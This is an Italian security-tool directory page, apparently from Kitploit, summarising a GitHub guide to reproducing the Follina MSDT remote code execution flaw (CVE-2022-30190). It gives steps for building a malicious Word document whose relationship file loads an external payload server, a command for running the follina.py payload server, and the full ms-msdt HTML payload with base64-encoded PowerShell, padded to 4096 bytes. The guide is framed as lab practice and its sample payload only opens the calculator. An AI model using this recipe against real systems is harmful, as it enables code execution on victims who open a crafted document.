Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-30190 — Guida alla riproduzione passo passo per la vulnerabilità di esecuzione remota di codice MSDT CVE-2022-30190 (Follina), inclusa la creazione di documenti dannosi e la configurazione del server C2. | Kitploit
Strumenti/GitHubGitHub/yrkuo/cve-2022-30190
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubyrkuo/cve-2022-30190

CVE-2022-30190

Guida alla riproduzione passo passo per la vulnerabilità di esecuzione remota di codice MSDT CVE-2022-30190 (Follina), inclusa la creazione di documenti dannosi e la configurazione del server C2.

Vedi Repository
13 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-30190

noto anche come Follina

Descrizione della vulnerabilità

Follina è presente nello strumento di diagnostica del supporto Microsoft (Microsoft Support Diagnostic Tool, MSDT). Quando un'applicazione chiama MSDT tramite il protocollo URL per il supporto, si verifica una vulnerabilità di esecuzione remota di codice. Un attacco sfruttato con successo consente a un hacker di eseguire codice arbitrario con i permessi dell'applicazione in esecuzione.

Ambiente di riproduzione della vulnerabilità

root@kitploit:~
* Host OS: Ubuntu 22.04 LST
* Guest OS: Windows 10 Pro x64, version 2004, build 19041.1237
* Microsoft office: word 2016

Procedura di riproduzione

Creazione del documento dannoso

Passo 1: Creare un documento Word (.docx) e inserire un oggetto OLE (ad es. Bitmap Image) nel testo.
Passo 2: Estrarre il file .docx, modificare il file word/_rels/document.xml.rels nella cartella; cambiare (evidenziato in giallo nell'immagine sotto) in , e aggiungere l'attributo . Passo 3: Modificare il file nella cartella; cambiare (evidenziato in giallo nell'immagine sotto) in e aggiungere l'attributo . Passo 4: Aprire il file .docx con 7-zip (senza estrarlo), reinserire i due file sopra menzionati nel file .docx e completare la creazione del documento dannoso.

Target="embeddings/oleObject1.bin"
Target = "http://<payload_server>/<random_name>.html!"
TargetMode = "External"

rels

word/document.xml
Type="Embed"
Type="Link"
UpdateMode="OnCall"

doc

Configurazione del server C2

Scaricare Follina.py pubblicato da John Hammond; qui prendiamo come esempio il richiamo di base della calcolatrice, python3 follina.py -c calc.exe -i eth0

NOTA

In Follina.py, le righe 117-125 servono principalmente a creare il payload dannoso (.html), il cui contenuto è il seguente: <script>location.href... è lo script che esegue la calcolatrice sulla macchina vittima. L'intero file viene inoltre riempito con un gran numero di caratteri casuali, con l'obiettivo di portare il file ad almeno 4096 byte; per il motivo, fare riferimento a “Follina” MSDT Attack

root@kitploit:~
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //pydvwofyowvcmgcaevgukzhjgmfirqpffuiclrgzlobvnrxknespfklndldfazyefpyxjbixgykmzeumodxedsxpaduvcqygjhrxzeqpuhdgcmpzsxkkpdzdielmoiwzknqxtxinxymsnuugffkxvzwxetrl...(4096 bytes)
</script

Riferimenti

Spiegazione della notizia Follina.py
documento dannoso
Test della vulnerabilità 1
Test della vulnerabilità 2
Test della vulnerabilità 3

Scarica lo strumento